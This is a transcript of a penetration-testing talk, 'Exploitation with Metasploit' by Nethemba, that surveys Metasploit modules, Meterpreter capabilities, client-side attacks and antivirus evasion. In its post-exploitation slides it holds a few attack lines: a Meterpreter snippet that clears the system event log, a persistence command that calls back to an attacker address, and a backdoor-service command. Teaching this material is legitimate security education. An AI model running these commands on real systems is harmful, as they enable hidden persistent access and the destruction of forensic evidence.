nethemba metasploit
TRANSCRIPT
![Page 1: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/1.jpg)
www.nethemba.com www.nethemba.com
Exploitation with Metasploit
Nethemba s.r.o.
Norbert Szetei, CEH [email protected]
![Page 2: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/2.jpg)
www.nethemba.com
Prologue Metasploit Project Metasploit Framework – opensource platform
for exploit developing, testing and using exploit code
Metasploit Express, Metasploit Pro, NeXpose
![Page 3: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/3.jpg)
www.nethemba.com
What else? Passive or active exploits Linux / Mac OS X / Windows / IRIX / HPUX /
Solaris IPS/IDS testing Different communication channels
![Page 4: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/4.jpg)
www.nethemba.com
History of Metasploit 1.0 (20032004) PERL, 15 exploits, project
started by HD Moore 2.7 (20032006) PERL, more than 150 exploits 3.+ (2007today) Ruby, 628 exploits Currently 18 active developers Code contribution from hundreds of people
![Page 5: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/5.jpg)
www.nethemba.com
Fundamental Parts Interfaces (Console, CLI, ...) Libraries (Rex, MSF Core, MSF Base) Plugins (db support, wmap, xmlrpc, ...) Tools (mostly external usage) Modules (Exploits, Auxiliaries, Payloads,
Encoders, Nops)
![Page 6: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/6.jpg)
www.nethemba.com
Metasploit testing environment Virtual machines laboratory Metasploitable Remove your Windows updates Hacking the web browsers Become a hac.. penetration tester
![Page 7: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/7.jpg)
www.nethemba.com
Simple Usage exploits (check), auxiliaries payloads (singles, stagers, stages) portscan, db_autopwn generating payloads meterpreter, vncinject (full control over user) msfencode, msfpayload
![Page 8: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/8.jpg)
www.nethemba.com
Meterpreter Injection into DLL Reverse connections Core commands Stdapi commands Priv commands
![Page 9: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/9.jpg)
www.nethemba.com
Meterpreter STDAPI File System commands Networking commands System commands User interface commands Keylogging
![Page 10: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/10.jpg)
www.nethemba.com
Meterpreter Priv System Elevation:
Named Pipe Impersonation
Token Duplication
KiTrap0D
hashdump timestomp (MACE)
![Page 11: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/11.jpg)
www.nethemba.com
Meterpreter Priv System Elevation:
Named Pipe Impersonation
Token Duplication
KiTrap0D
hashdump timestomp (MACE)
![Page 12: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/12.jpg)
www.nethemba.com
Can a firewall protect us?● Attacks on layer 7● Botnets● Social Engineering + Phishing (SET)● PassiveX● IDS Detection > SSL Encryption
![Page 13: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/13.jpg)
www.nethemba.com
Passive X● Modifies registry on Windows to permit loading
untrusted ActiveX● Loads stage ActiveX control from MSF web
server● Loads stagers (Meterpreter, VNC) via HTTP
tunnel● Unfortunately it works in IE6 only
![Page 14: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/14.jpg)
www.nethemba.com
Reflective DLL Injection Loading of a library from memory into a host
process Library is responsible for loading itself by
implementing a minimal Portable Executable (PE) file loader
Minimal interaction with the host system and process
Difficult detection of the DLL
![Page 15: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/15.jpg)
www.nethemba.com
Integration with third party apps● Nessus● NeXpose● (Ratproxy) WMAP Web Scanner● (Aircrack) Karmetasploit
![Page 16: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/16.jpg)
www.nethemba.com
Exploit development● pattern_create.rb, pattern_offset.rb● porting exploits● SEH exploitation, msfpescan● msfelfscan, msfmachscan● irb, framework for exploits development
![Page 17: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/17.jpg)
www.nethemba.com
Exploitation on the Client Side● Binary Payloads● Trojan Infection● PDF● Java Applet● VBScript● Antivirus bypass
![Page 18: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/18.jpg)
www.nethemba.com
msfencode● msfpayload for raw payload generation● Msfencode x
Specify an alternate win32 executable template● Injection into an existing executable, the same
functionality
![Page 19: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/19.jpg)
www.nethemba.com
Post Exploitation● PSExec (windows/smb/psexec)● Covering your tracks (event logs)
log = client.sys.eventlog.open('system') log.clear
● Sniffing (meterpreter, auxiliaries)
![Page 20: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/20.jpg)
www.nethemba.com
Maintaining access● Persistent Meterpreter Service
run persistence X i 15 p 3443 r 192.168.64.3● Meterpreter Backdoor Service
metsvc h
![Page 21: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/21.jpg)
www.nethemba.com
Epilogue
If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology. (Bruce Schneier)
![Page 22: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/22.jpg)
www.nethemba.com
References● http://www.metasploit.com● http://www.offensivesecurity.com/
● svn co https://www.metasploit.com/svn/framework3/trunk/
![Page 23: Nethemba metasploit](https://reader034.vdocuments.site/reader034/viewer/2022052218/55759608d8b42ae7708b52d8/html5/thumbnails/23.jpg)
www.nethemba.com
Any questions?
Thank you for listening
Norbert Szetei, CEH